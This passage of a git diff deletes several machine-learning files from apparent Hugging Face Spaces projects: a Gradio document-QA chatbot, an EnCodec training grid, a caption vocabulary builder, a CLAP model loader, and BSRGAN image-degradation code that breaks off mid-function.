docs.extend(loader.load()) - - # Create a knowledge base from the loaded documents using the create_knowledge_base() method - knowledge_base = self.create_knowledge_base(docs) - - return file_paths,{"knowledge_base":knowledge_base} - - def answer_question(self, question,history,state): - """Answer a question based on the current knowledge base. - Args: - state (dict): The current state containing the knowledge base. - Returns: - str: The answer to the question. - """ - - # Retrieve the knowledge base from the state dictionary - knowledge_base = state["knowledge_base"] - retriever = knowledge_base.as_retriever() - qa = ConversationalRetrievalChain.from_llm( - llm=OpenAI(temperature=0.1), - retriever=retriever, - return_source_documents=False) - # Set the question for which we want to find the answer - res = [] - question = history[-1][0] - for human, ai in history[:-1]: - pair = (human, ai) - res.append(pair) - - chat_history = [] - - query = question - result = qa({"question": query, "chat_history": chat_history}) - # Perform a similarity search on the knowledge base to retrieve relevant documents - response = result["answer"] - # Return the response as the answer to the question - history[-1][1] = response - print("History for QA : ",history) - return history - - - def clear_function(self,state): - state.clear() - # state = gr.State(self.get_empty_state()) - - def gradio_interface(self): - - """Create the Gradio interface for the Chemical Identifier.""" - - with gr.Blocks(css="style.css",theme='karthikeyan-adople/hudsonhayes-gray') as demo: - gr.HTML("""
    -
    -

    - ADOPLE AI -

    -
    - -

    - Virtual Assistant Chatbot -

    -
    """) - state = gr.State(self.get_empty_state()) - with gr.Column(elem_id="col-container"): - with gr.Accordion("Upload Files", open = False): - with gr.Row(elem_id="row-flex"): - with gr.Row(elem_id="row-flex"): - with gr.Column(scale=1,): - file_url = gr.Textbox(label='file url :',show_label=True, placeholder="") - with gr.Row(elem_id="row-flex"): - with gr.Column(scale=1): - file_output = gr.File() - with gr.Column(scale=1): - upload_button = gr.UploadButton("Browse File", file_types=[".txt", ".pdf", ".doc", ".docx"],file_count = "multiple") - with gr.Row(): - chatbot = gr.Chatbot([], elem_id="chatbot") - with gr.Row(): - txt = gr.Textbox(label = "Question",show_label=True,placeholder="Enter text and press Enter") - with gr.Row(): - clear_btn = gr.Button(value="Clear") - - txt_msg = txt.submit(self.add_text, [chatbot, txt], [chatbot, txt], queue=False).then(self.answer_question, [txt, chatbot, state], chatbot) - txt_msg.then(lambda: gr.update(interactive=True), None, [txt], queue=False) - file_url.submit(self.upload_multiple_urls, file_url, [file_output, state]) - clear_btn.click(self.clear_function,[state],[]) - clear_btn.click(lambda: None, None, chatbot, queue=False) - upload_button.upload(self.upload_file, upload_button, [file_output,state]) - demo.queue().launch(debug=True) - -if __name__=="__main__": - chatbot = Chatbot() - chatbot.gradio_interface() \ No newline at end of file diff --git a/spaces/AIConsultant/MusicGen/audiocraft/grids/compression/encodec_base_24khz.py b/spaces/AIConsultant/MusicGen/audiocraft/grids/compression/encodec_base_24khz.py deleted file mode 100644 index 117b2b1e496ca31b3d614672b472c9213cedb4ad..0000000000000000000000000000000000000000 --- a/spaces/AIConsultant/MusicGen/audiocraft/grids/compression/encodec_base_24khz.py +++ /dev/null @@ -1,28 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. -# All rights reserved. -# -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. - -""" -Grid search file, simply list all the exp you want in `explorer`. -Any new exp added there will be scheduled. -You can cancel and experiment by commenting its line. - -This grid shows how to train a base causal EnCodec model at 24 kHz. 
-""" - -from ._explorers import CompressionExplorer -from ...environment import AudioCraftEnvironment - - -@CompressionExplorer -def explorer(launcher): - partitions = AudioCraftEnvironment.get_slurm_partitions(['team', 'global']) - launcher.slurm_(gpus=8, partition=partitions) - # base causal EnCodec trained on monophonic audio sampled at 24 kHz - launcher.bind_(solver='compression/encodec_base_24khz') - # replace this by the desired dataset - launcher.bind_(dset='audio/example') - # launch xp - launcher() diff --git a/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/utils/build_vocab_ltp.py b/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/utils/build_vocab_ltp.py deleted file mode 100644 index aae0c718ae546882dcb573be42ace3408394468f..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/AudioGPT/audio_to_text/captioning/utils/build_vocab_ltp.py +++ /dev/null @@ -1,150 +0,0 @@ -import json -from tqdm import tqdm -import logging -import pickle -from collections import Counter -import re -import fire - -class Vocabulary(object): - """Simple vocabulary wrapper.""" - def __init__(self): - self.word2idx = {} - self.idx2word = {} - self.idx = 0 - - def add_word(self, word): - if not word in self.word2idx: - self.word2idx[word] = self.idx - self.idx2word[self.idx] = word - self.idx += 1 - - def __call__(self, word): - if not word in self.word2idx: - return self.word2idx[""] - return self.word2idx[word] - - def __len__(self): - return len(self.word2idx) - -def build_vocab(input_json: str, - output_json: str, - threshold: int, - keep_punctuation: bool, - character_level: bool = False, - zh: bool = True ): - """Build vocabulary from csv file with a given threshold to drop all counts < threshold - - Args: - input_json(string): Preprossessed json file. Structure like this: - { - 'audios': [ - { - 'audio_id': 'xxx', - 'captions': [ - { - 'caption': 'xxx', - 'cap_id': 'xxx' - } - ] - }, - ... - ] - } - threshold (int): Threshold to drop all words with counts < threshold - keep_punctuation (bool): Includes or excludes punctuation. 
- - Returns: - vocab (Vocab): Object with the processed vocabulary -""" - data = json.load(open(input_json, "r"))["audios"] - counter = Counter() - pretokenized = "tokens" in data[0]["captions"][0] - - if zh: - from ltp import LTP - from zhon.hanzi import punctuation - if not pretokenized: - parser = LTP("base") - for audio_idx in tqdm(range(len(data)), leave=False, ascii=True): - for cap_idx in range(len(data[audio_idx]["captions"])): - if pretokenized: - tokens = data[audio_idx]["captions"][cap_idx]["tokens"].split() - else: - caption = data[audio_idx]["captions"][cap_idx]["caption"] - if character_level: - tokens = list(caption) - else: - tokens, _ = parser.seg([caption]) - tokens = tokens[0] - # Remove all punctuations - if not keep_punctuation: - tokens = [token for token in tokens if token not in punctuation] - data[audio_idx]["captions"][cap_idx]["tokens"] = " ".join(tokens) - counter.update(tokens) - else: - if pretokenized: - for audio_idx in tqdm(range(len(data)), leave=False, ascii=True): - for cap_idx in range(len(data[audio_idx]["captions"])): - tokens = data[audio_idx]["captions"][cap_idx]["tokens"].split() - counter.update(tokens) - else: - from pycocoevalcap.tokenizer.ptbtokenizer import PTBTokenizer - captions = {} - for audio_idx in range(len(data)): - audio_id = data[audio_idx]["audio_id"] - captions[audio_id] = [] - for cap_idx in range(len(data[audio_idx]["captions"])): - caption = data[audio_idx]["captions"][cap_idx]["caption"] - captions[audio_id].append({ - "audio_id": audio_id, - "id": cap_idx, - "caption": caption - }) - tokenizer = PTBTokenizer() - captions = tokenizer.tokenize(captions) - for audio_idx in tqdm(range(len(data)), leave=False, ascii=True): - audio_id = data[audio_idx]["audio_id"] - for cap_idx in range(len(data[audio_idx]["captions"])): - tokens = captions[audio_id][cap_idx] - data[audio_idx]["captions"][cap_idx]["tokens"] = tokens - counter.update(tokens.split(" ")) - - if not pretokenized: - if output_json is None: - output_json = input_json - json.dump({ "audios": data }, open(output_json, "w"), indent=4, ensure_ascii=not zh) - words = [word for word, cnt in counter.items() if cnt >= threshold] - - # Create a vocab wrapper and add some special tokens. - vocab = Vocabulary() - vocab.add_word("") - vocab.add_word("") - vocab.add_word("") - vocab.add_word("") - - # Add the words to the vocabulary. 
- for word in words: - vocab.add_word(word) - return vocab - -def process(input_json: str, - output_file: str, - output_json: str = None, - threshold: int = 1, - keep_punctuation: bool = False, - character_level: bool = False, - zh: bool = True): - logfmt = "%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s" - logging.basicConfig(level=logging.INFO, format=logfmt) - logging.info("Build Vocab") - vocabulary = build_vocab( - input_json=input_json, output_json=output_json, threshold=threshold, - keep_punctuation=keep_punctuation, character_level=character_level, zh=zh) - pickle.dump(vocabulary, open(output_file, "wb")) - logging.info("Total vocabulary size: {}".format(len(vocabulary))) - logging.info("Saved vocab to '{}'".format(output_file)) - - -if __name__ == '__main__': - fire.Fire(process) diff --git a/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/encoders/open_clap/openai.py b/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/encoders/open_clap/openai.py deleted file mode 100644 index 9911b6e135e51970177fcac067c12192b0b57c1c..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/Make_An_Audio/ldm/modules/encoders/open_clap/openai.py +++ /dev/null @@ -1,129 +0,0 @@ -""" OpenAI pretrained model functions - -Adapted from https://github.com/openai/CLIP. Originally MIT License, Copyright (c) 2021 OpenAI. -""" - -import os -import warnings -from typing import Union, List - -import torch - -from .model import build_model_from_openai_state_dict -from .pretrained import get_pretrained_url, list_pretrained_tag_models, download_pretrained - -__all__ = ["list_openai_models", "load_openai_model"] - - -def list_openai_models() -> List[str]: - """Returns the names of available CLIP models""" - return list_pretrained_tag_models('openai') - - -def load_openai_model( - name: str, - model_cfg, - device: Union[str, torch.device] = "cuda" if torch.cuda.is_available() else "cpu", - jit=True, - cache_dir=os.path.expanduser("~/.cache/clip"), - enable_fusion: bool = False, - fusion_type: str = 'None' -): - """Load a CLIP model, preserve its text pretrained part, and set in the CLAP model - - Parameters - ---------- - name : str - A model name listed by `clip.available_models()`, or the path to a model checkpoint containing the state_dict - device : Union[str, torch.device] - The device to put the loaded model - jit : bool - Whether to load the optimized JIT model (default) or more hackable non-JIT model. - - Returns - ------- - model : torch.nn.Module - The CLAP model - preprocess : Callable[[PIL.Image], torch.Tensor] - A torchvision transform that converts a PIL image into a tensor that the returned model can take as its input - """ - if get_pretrained_url(name, 'openai'): - model_path = download_pretrained(get_pretrained_url(name, 'openai'), root=cache_dir) - elif os.path.isfile(name): - model_path = name - else: - raise RuntimeError(f"Model {name} not found; available models = {list_openai_models()}") - - try: - # loading JIT archive - model = torch.jit.load(model_path, map_location=device if jit else "cpu").eval() - state_dict = None - except RuntimeError: - # loading saved state dict - if jit: - warnings.warn(f"File {model_path} is not a JIT archive. 
Loading as a state dict instead") - jit = False - state_dict = torch.load(model_path, map_location="cpu") - - if not jit: - try: - model = build_model_from_openai_state_dict(state_dict or model.state_dict(), model_cfg, enable_fusion, fusion_type).to(device) - except KeyError: - sd = {k[7:]: v for k, v in state_dict["state_dict"].items()} - model = build_model_from_openai_state_dict(sd, model_cfg, enable_fusion, fusion_type).to(device) - - if str(device) == "cpu": - model.float() - return model - - # patch the device names - device_holder = torch.jit.trace(lambda: torch.ones([]).to(torch.device(device)), example_inputs=[]) - device_node = [n for n in device_holder.graph.findAllNodes("prim::Constant") if "Device" in repr(n)][-1] - - def patch_device(module): - try: - graphs = [module.graph] if hasattr(module, "graph") else [] - except RuntimeError: - graphs = [] - - if hasattr(module, "forward1"): - graphs.append(module.forward1.graph) - - for graph in graphs: - for node in graph.findAllNodes("prim::Constant"): - if "value" in node.attributeNames() and str(node["value"]).startswith("cuda"): - node.copyAttributes(device_node) - - model.apply(patch_device) - patch_device(model.encode_audio) - patch_device(model.encode_text) - - # patch dtype to float32 on CPU - if str(device) == "cpu": - float_holder = torch.jit.trace(lambda: torch.ones([]).float(), example_inputs=[]) - float_input = list(float_holder.graph.findNode("aten::to").inputs())[1] - float_node = float_input.node() - - def patch_float(module): - try: - graphs = [module.graph] if hasattr(module, "graph") else [] - except RuntimeError: - graphs = [] - - if hasattr(module, "forward1"): - graphs.append(module.forward1.graph) - - for graph in graphs: - for node in graph.findAllNodes("aten::to"): - inputs = list(node.inputs()) - for i in [1, 2]: # dtype can be the second or third argument to aten::to() - if inputs[i].node()["value"] == 5: - inputs[i].node().copyAttributes(float_node) - - model.apply(patch_float) - patch_float(model.encode_audio) - patch_float(model.encode_text) - model.float() - - model.audio_branch.audio_length = model.audio_cfg.audio_length - return model diff --git a/spaces/AIGText/GlyphControl/ldm/modules/image_degradation/bsrgan.py b/spaces/AIGText/GlyphControl/ldm/modules/image_degradation/bsrgan.py deleted file mode 100644 index 32ef56169978e550090261cddbcf5eb611a6173b..0000000000000000000000000000000000000000 --- a/spaces/AIGText/GlyphControl/ldm/modules/image_degradation/bsrgan.py +++ /dev/null @@ -1,730 +0,0 @@ -# -*- coding: utf-8 -*- -""" -# -------------------------------------------- -# Super-Resolution -# -------------------------------------------- -# -# Kai Zhang (cskaizhang@gmail.com) -# https://github.com/cszn -# From 2019/03--2021/08 -# -------------------------------------------- -""" - -import numpy as np -import cv2 -import torch - -from functools import partial -import random -from scipy import ndimage -import scipy -import scipy.stats as ss -from scipy.interpolate import interp2d -from scipy.linalg import orth -import albumentations - -import ldm.modules.image_degradation.utils_image as util - - -def modcrop_np(img, sf): - ''' - Args: - img: numpy image, WxH or WxHxC - sf: scale factor - Return: - cropped image - ''' - w, h = img.shape[:2] - im = np.copy(img) - return im[:w - w % sf, :h - h % sf, ...] 
- - -""" -# -------------------------------------------- -# anisotropic Gaussian kernels -# -------------------------------------------- -""" - - -def analytic_kernel(k): - """Calculate the X4 kernel from the X2 kernel (for proof see appendix in paper)""" - k_size = k.shape[0] - # Calculate the big kernels size - big_k = np.zeros((3 * k_size - 2, 3 * k_size - 2)) - # Loop over the small kernel to fill the big one - for r in range(k_size): - for c in range(k_size): - big_k[2 * r:2 * r + k_size, 2 * c:2 * c + k_size] += k[r, c] * k - # Crop the edges of the big kernel to ignore very small values and increase run time of SR - crop = k_size // 2 - cropped_big_k = big_k[crop:-crop, crop:-crop] - # Normalize to 1 - return cropped_big_k / cropped_big_k.sum() - - -def anisotropic_Gaussian(ksize=15, theta=np.pi, l1=6, l2=6): - """ generate an anisotropic Gaussian kernel - Args: - ksize : e.g., 15, kernel size - theta : [0, pi], rotation angle range - l1 : [0.1,50], scaling of eigenvalues - l2 : [0.1,l1], scaling of eigenvalues - If l1 = l2, will get an isotropic Gaussian kernel. - Returns: - k : kernel - """ - - v = np.dot(np.array([[np.cos(theta), -np.sin(theta)], [np.sin(theta), np.cos(theta)]]), np.array([1., 0.])) - V = np.array([[v[0], v[1]], [v[1], -v[0]]]) - D = np.array([[l1, 0], [0, l2]]) - Sigma = np.dot(np.dot(V, D), np.linalg.inv(V)) - k = gm_blur_kernel(mean=[0, 0], cov=Sigma, size=ksize) - - return k - - -def gm_blur_kernel(mean, cov, size=15): - center = size / 2.0 + 0.5 - k = np.zeros([size, size]) - for y in range(size): - for x in range(size): - cy = y - center + 1 - cx = x - center + 1 - k[y, x] = ss.multivariate_normal.pdf([cx, cy], mean=mean, cov=cov) - - k = k / np.sum(k) - return k - - -def shift_pixel(x, sf, upper_left=True): - """shift pixel for super-resolution with different scale factors - Args: - x: WxHxC or WxH - sf: scale factor - upper_left: shift direction - """ - h, w = x.shape[:2] - shift = (sf - 1) * 0.5 - xv, yv = np.arange(0, w, 1.0), np.arange(0, h, 1.0) - if upper_left: - x1 = xv + shift - y1 = yv + shift - else: - x1 = xv - shift - y1 = yv - shift - - x1 = np.clip(x1, 0, w - 1) - y1 = np.clip(y1, 0, h - 1) - - if x.ndim == 2: - x = interp2d(xv, yv, x)(x1, y1) - if x.ndim == 3: - for i in range(x.shape[-1]): - x[:, :, i] = interp2d(xv, yv, x[:, :, i])(x1, y1) - - return x - - -def blur(x, k): - ''' - x: image, NxcxHxW - k: kernel, Nx1xhxw - ''' - n, c = x.shape[:2] - p1, p2 = (k.shape[-2] - 1) // 2, (k.shape[-1] - 1) // 2 - x = torch.nn.functional.pad(x, pad=(p1, p2, p1, p2), mode='replicate') - k = k.repeat(1, c, 1, 1) - k = k.view(-1, 1, k.shape[2], k.shape[3]) - x = x.view(1, -1, x.shape[2], x.shape[3]) - x = torch.nn.functional.conv2d(x, k, bias=None, stride=1, padding=0, groups=n * c) - x = x.view(n, c, x.shape[2], x.shape[3]) - - return x - - -def gen_kernel(k_size=np.array([15, 15]), scale_factor=np.array([4, 4]), min_var=0.6, max_var=10., noise_level=0): - """" - # modified version of https://github.com/assafshocher/BlindSR_dataset_generator - # Kai Zhang - # min_var = 0.175 * sf # variance of the gaussian kernel will be sampled between min_var and max_var - # max_var = 2.5 * sf - """ - # Set random eigen-vals (lambdas) and angle (theta) for COV matrix - lambda_1 = min_var + np.random.rand() * (max_var - min_var) - lambda_2 = min_var + np.random.rand() * (max_var - min_var) - theta = np.random.rand() * np.pi # random theta - noise = -noise_level + np.random.rand(*k_size) * noise_level * 2 - - # Set COV matrix using Lambdas and Theta - LAMBDA = 
np.diag([lambda_1, lambda_2]) - Q = np.array([[np.cos(theta), -np.sin(theta)], - [np.sin(theta), np.cos(theta)]]) - SIGMA = Q @ LAMBDA @ Q.T - INV_SIGMA = np.linalg.inv(SIGMA)[None, None, :, :] - - # Set expectation position (shifting kernel for aligned image) - MU = k_size // 2 - 0.5 * (scale_factor - 1) # - 0.5 * (scale_factor - k_size % 2) - MU = MU[None, None, :, None] - - # Create meshgrid for Gaussian - [X, Y] = np.meshgrid(range(k_size[0]), range(k_size[1])) - Z = np.stack([X, Y], 2)[:, :, :, None] - - # Calcualte Gaussian for every pixel of the kernel - ZZ = Z - MU - ZZ_t = ZZ.transpose(0, 1, 3, 2) - raw_kernel = np.exp(-0.5 * np.squeeze(ZZ_t @ INV_SIGMA @ ZZ)) * (1 + noise) - - # shift the kernel so it will be centered - # raw_kernel_centered = kernel_shift(raw_kernel, scale_factor) - - # Normalize the kernel and return - # kernel = raw_kernel_centered / np.sum(raw_kernel_centered) - kernel = raw_kernel / np.sum(raw_kernel) - return kernel - - -def fspecial_gaussian(hsize, sigma): - hsize = [hsize, hsize] - siz = [(hsize[0] - 1.0) / 2.0, (hsize[1] - 1.0) / 2.0] - std = sigma - [x, y] = np.meshgrid(np.arange(-siz[1], siz[1] + 1), np.arange(-siz[0], siz[0] + 1)) - arg = -(x * x + y * y) / (2 * std * std) - h = np.exp(arg) - h[h < scipy.finfo(float).eps * h.max()] = 0 - sumh = h.sum() - if sumh != 0: - h = h / sumh - return h - - -def fspecial_laplacian(alpha): - alpha = max([0, min([alpha, 1])]) - h1 = alpha / (alpha + 1) - h2 = (1 - alpha) / (alpha + 1) - h = [[h1, h2, h1], [h2, -4 / (alpha + 1), h2], [h1, h2, h1]] - h = np.array(h) - return h - - -def fspecial(filter_type, *args, **kwargs): - ''' - python code from: - https://github.com/ronaldosena/imagens-medicas-2/blob/40171a6c259edec7827a6693a93955de2bd39e76/Aulas/aula_2_-_uniform_filter/matlab_fspecial.py - ''' - if filter_type == 'gaussian': - return fspecial_gaussian(*args, **kwargs) - if filter_type == 'laplacian': - return fspecial_laplacian(*args, **kwargs) - - -""" -# -------------------------------------------- -# degradation models -# -------------------------------------------- -""" - - -def bicubic_degradation(x, sf=3): - ''' - Args: - x: HxWxC image, [0, 1] - sf: down-scale factor - Return: - bicubicly downsampled LR image - ''' - x = util.imresize_np(x, scale=1 / sf) - return x - - -def srmd_degradation(x, k, sf=3): - ''' blur + bicubic downsampling - Args: - x: HxWxC image, [0, 1] - k: hxw, double - sf: down-scale factor - Return: - downsampled LR image - Reference: - @inproceedings{zhang2018learning, - title={Learning a single convolutional super-resolution network for multiple degradations}, - author={Zhang, Kai and Zuo, Wangmeng and Zhang, Lei}, - booktitle={IEEE Conference on Computer Vision and Pattern Recognition}, - pages={3262--3271}, - year={2018} - } - ''' - x = ndimage.filters.convolve(x, np.expand_dims(k, axis=2), mode='wrap') # 'nearest' | 'mirror' - x = bicubic_degradation(x, sf=sf) - return x - - -def dpsr_degradation(x, k, sf=3): - ''' bicubic downsampling + blur - Args: - x: HxWxC image, [0, 1] - k: hxw, double - sf: down-scale factor - Return: - downsampled LR image - Reference: - @inproceedings{zhang2019deep, - title={Deep Plug-and-Play Super-Resolution for Arbitrary Blur Kernels}, - author={Zhang, Kai and Zuo, Wangmeng and Zhang, Lei}, - booktitle={IEEE Conference on Computer Vision and Pattern Recognition}, - pages={1671--1681}, - year={2019} - } - ''' - x = bicubic_degradation(x, sf=sf) - x = ndimage.filters.convolve(x, np.expand_dims(k, axis=2), mode='wrap') - return x - - -def 
classical_degradation(x, k, sf=3): - ''' blur + downsampling - Args: - x: HxWxC image, [0, 1]/[0, 255] - k: hxw, double - sf: down-scale factor - Return: - downsampled LR image - ''' - x = ndimage.filters.convolve(x, np.expand_dims(k, axis=2), mode='wrap') - # x = filters.correlate(x, np.expand_dims(np.flip(k), axis=2)) - st = 0 - return x[st::sf, st::sf, ...] - - -def add_sharpening(img, weight=0.5, radius=50, threshold=10): - """USM sharpening. borrowed from real-ESRGAN - Input image: I; Blurry image: B. - 1. K = I + weight * (I - B) - 2. Mask = 1 if abs(I - B) > threshold, else: 0 - 3. Blur mask: - 4. Out = Mask * K + (1 - Mask) * I - Args: - img (Numpy array): Input image, HWC, BGR; float32, [0, 1]. - weight (float): Sharp weight. Default: 1. - radius (float): Kernel size of Gaussian blur. Default: 50. - threshold (int): - """ - if radius % 2 == 0: - radius += 1 - blur = cv2.GaussianBlur(img, (radius, radius), 0) - residual = img - blur - mask = np.abs(residual) * 255 > threshold - mask = mask.astype('float32') - soft_mask = cv2.GaussianBlur(mask, (radius, radius), 0) - - K = img + weight * residual - K = np.clip(K, 0, 1) - return soft_mask * K + (1 - soft_mask) * img - - -def add_blur(img, sf=4): - wd2 = 4.0 + sf - wd = 2.0 + 0.2 * sf - if random.random() < 0.5: - l1 = wd2 * random.random() - l2 = wd2 * random.random() - k = anisotropic_Gaussian(ksize=2 * random.randint(2, 11) + 3, theta=random.random() * np.pi, l1=l1, l2=l2) - else: - k = fspecial('gaussian', 2 * random.randint(2, 11) + 3, wd * random.random()) - img = ndimage.filters.convolve(img, np.expand_dims(k, axis=2), mode='mirror') - - return img - - -def add_resize(img, sf=4): - rnum = np.random.rand() - if rnum > 0.8: # up - sf1 = random.uniform(1, 2) - elif rnum < 0.7: # down - sf1 = random.uniform(0.5 / sf, 1) - else: - sf1 = 1.0 - img = cv2.resize(img, (int(sf1 * img.shape[1]), int(sf1 * img.shape[0])), interpolation=random.choice([1, 2, 3])) - img = np.clip(img, 0.0, 1.0) - - return img - - -# def add_Gaussian_noise(img, noise_level1=2, noise_level2=25): -# noise_level = random.randint(noise_level1, noise_level2) -# rnum = np.random.rand() -# if rnum > 0.6: # add color Gaussian noise -# img += np.random.normal(0, noise_level / 255.0, img.shape).astype(np.float32) -# elif rnum < 0.4: # add grayscale Gaussian noise -# img += np.random.normal(0, noise_level / 255.0, (*img.shape[:2], 1)).astype(np.float32) -# else: # add noise -# L = noise_level2 / 255. -# D = np.diag(np.random.rand(3)) -# U = orth(np.random.rand(3, 3)) -# conv = np.dot(np.dot(np.transpose(U), D), U) -# img += np.random.multivariate_normal([0, 0, 0], np.abs(L ** 2 * conv), img.shape[:2]).astype(np.float32) -# img = np.clip(img, 0.0, 1.0) -# return img - -def add_Gaussian_noise(img, noise_level1=2, noise_level2=25): - noise_level = random.randint(noise_level1, noise_level2) - rnum = np.random.rand() - if rnum > 0.6: # add color Gaussian noise - img = img + np.random.normal(0, noise_level / 255.0, img.shape).astype(np.float32) - elif rnum < 0.4: # add grayscale Gaussian noise - img = img + np.random.normal(0, noise_level / 255.0, (*img.shape[:2], 1)).astype(np.float32) - else: # add noise - L = noise_level2 / 255. 
- D = np.diag(np.random.rand(3)) - U = orth(np.random.rand(3, 3)) - conv = np.dot(np.dot(np.transpose(U), D), U) - img = img + np.random.multivariate_normal([0, 0, 0], np.abs(L ** 2 * conv), img.shape[:2]).astype(np.float32) - img = np.clip(img, 0.0, 1.0) - return img - - -def add_speckle_noise(img, noise_level1=2, noise_level2=25): - noise_level = random.randint(noise_level1, noise_level2) - img = np.clip(img, 0.0, 1.0) - rnum = random.random() - if rnum > 0.6: - img += img * np.random.normal(0, noise_level / 255.0, img.shape).astype(np.float32) - elif rnum < 0.4: - img += img * np.random.normal(0, noise_level / 255.0, (*img.shape[:2], 1)).astype(np.float32) - else: - L = noise_level2 / 255. - D = np.diag(np.random.rand(3)) - U = orth(np.random.rand(3, 3)) - conv = np.dot(np.dot(np.transpose(U), D), U) - img += img * np.random.multivariate_normal([0, 0, 0], np.abs(L ** 2 * conv), img.shape[:2]).astype(np.float32) - img = np.clip(img, 0.0, 1.0) - return img - - -def add_Poisson_noise(img): - img = np.clip((img * 255.0).round(), 0, 255) / 255. - vals = 10 ** (2 * random.random() + 2.0) # [2, 4] - if random.random() < 0.5: - img = np.random.poisson(img * vals).astype(np.float32) / vals - else: - img_gray = np.dot(img[..., :3], [0.299, 0.587, 0.114]) - img_gray = np.clip((img_gray * 255.0).round(), 0, 255) / 255. - noise_gray = np.random.poisson(img_gray * vals).astype(np.float32) / vals - img_gray - img += noise_gray[:, :, np.newaxis] - img = np.clip(img, 0.0, 1.0) - return img - - -def add_JPEG_noise(img): - quality_factor = random.randint(30, 95) - img = cv2.cvtColor(util.single2uint(img), cv2.COLOR_RGB2BGR) - result, encimg = cv2.imencode('.jpg', img, [int(cv2.IMWRITE_JPEG_QUALITY), quality_factor]) - img = cv2.imdecode(encimg, 1) - img = cv2.cvtColor(util.uint2single(img), cv2.COLOR_BGR2RGB) - return img - - -def random_crop(lq, hq, sf=4, lq_patchsize=64): - h, w = lq.shape[:2] - rnd_h = random.randint(0, h - lq_patchsize) - rnd_w = random.randint(0, w - lq_patchsize) - lq = lq[rnd_h:rnd_h + lq_patchsize, rnd_w:rnd_w + lq_patchsize, :] - - rnd_h_H, rnd_w_H = int(rnd_h * sf), int(rnd_w * sf) - hq = hq[rnd_h_H:rnd_h_H + lq_patchsize * sf, rnd_w_H:rnd_w_H + lq_patchsize * sf, :] - return lq, hq - - -def degradation_bsrgan(img, sf=4, lq_patchsize=72, isp_model=None): - """ - This is the degradation model of BSRGAN from the paper - "Designing a Practical Degradation Model for Deep Blind Image Super-Resolution" - ---------- - img: HXWXC, [0, 1], its size should be large than (lq_patchsizexsf)x(lq_patchsizexsf) - sf: scale factor - isp_model: camera ISP model - Returns - ------- - img: low-quality patch, size: lq_patchsizeXlq_patchsizeXC, range: [0, 1] - hq: corresponding high-quality patch, size: (lq_patchsizexsf)X(lq_patchsizexsf)XC, range: [0, 1] - """ - isp_prob, jpeg_prob, scale2_prob = 0.25, 0.9, 0.25 - sf_ori = sf - - h1, w1 = img.shape[:2] - img = img.copy()[:w1 - w1 % sf, :h1 - h1 % sf, ...] 
# mod crop - h, w = img.shape[:2] - - if h < lq_patchsize * sf or w < lq_patchsize * sf: - raise ValueError(f'img size ({h1}X{w1}) is too small!') - - hq = img.copy() - - if sf == 4 and random.random() < scale2_prob: # downsample1 - if np.random.rand() < 0.5: - img = cv2.resize(img, (int(1 / 2 * img.shape[1]), int(1 / 2 * img.shape[0])), - interpolation=random.choice([1, 2, 3])) - else: - img = util.imresize_np(img, 1 / 2, True) - img = np.clip(img, 0.0, 1.0) - sf = 2 - - shuffle_order = random.sample(range(7), 7) - idx1, idx2 = shuffle_order.index(2), shuffle_order.index(3) - if idx1 > idx2: # keep downsample3 last - shuffle_order[idx1], shuffle_order[idx2] = shuffle_order[idx2], shuffle_order[idx1] - - for i in shuffle_order: - - if i == 0: - img = add_blur(img, sf=sf) - - elif i == 1: - img = add_blur(img, sf=sf) - - elif i == 2: - a, b = img.shape[1], img.shape[0] - # downsample2 - if random.random() < 0.75: - sf1 = random.uniform(1, 2 * sf) - img = cv2.resize(img, (int(1 / sf1 * img.shape[1]), int(1 / sf1 * img.shape[0])), - interpolation=random.choice([1, 2, 3])) - else: - k = fspecial('gaussian', 25, random.uniform(0.1, 0.6 * sf)) - k_shifted = shift_pixel(k, sf) - k_shifted = k_shifted / k_shifted.sum() # blur with shifted kernel - img = ndimage.filters.convolve(img, np.expand_dims(k_shifted, axis=2), mode='mirror') - img = img[0::sf, 0::sf, ...] # nearest downsampling - img = np.clip(img, 0.0, 1.0) - - elif i == 3: - # downsample3 - img = cv2.resize(img, (int(1 / sf * a), int(1 / sf * b)), interpolation=random.choice([1, 2, 3])) - img = np.clip(img, 0.0, 1.0) - - elif i == 4: - # add Gaussian noise - img = add_Gaussian_noise(img, noise_level1=2, noise_level2=25) - - elif i == 5: - # add JPEG noise - if random.random() < jpeg_prob: - img = add_JPEG_noise(img) - - elif i == 6: - # add processed camera sensor noise - if random.random() < isp_prob and isp_model is not None: - with torch.no_grad(): - img, hq = isp_model.forward(img.copy(), hq) - - # add final JPEG compression noise - img = add_JPEG_noise(img) - - # random crop - img, hq = random_crop(img, hq, sf_ori, lq_patchsize) - - return img, hq - - -# todo no isp_model? -def degradation_bsrgan_variant(image, sf=4, isp_model=None): - """ - This is the degradation model of BSRGAN from the paper - "Designing a Practical Degradation Model for Deep Blind Image Super-Resolution" - ---------- - sf: scale factor - isp_model: camera ISP model - Returns - ------- - img: low-quality patch, size: lq_patchsizeXlq_patchsizeXC, range: [0, 1] - hq: corresponding high-quality patch, size: (lq_patchsizexsf)X(lq_patchsizexsf)XC, range: [0, 1] - """ - image = util.uint2single(image) - isp_prob, jpeg_prob, scale2_prob = 0.25, 0.9, 0.25 - sf_ori = sf - - h1, w1 = image.shape[:2] - image = image.copy()[:w1 - w1 % sf, :h1 - h1 % sf, ...] 
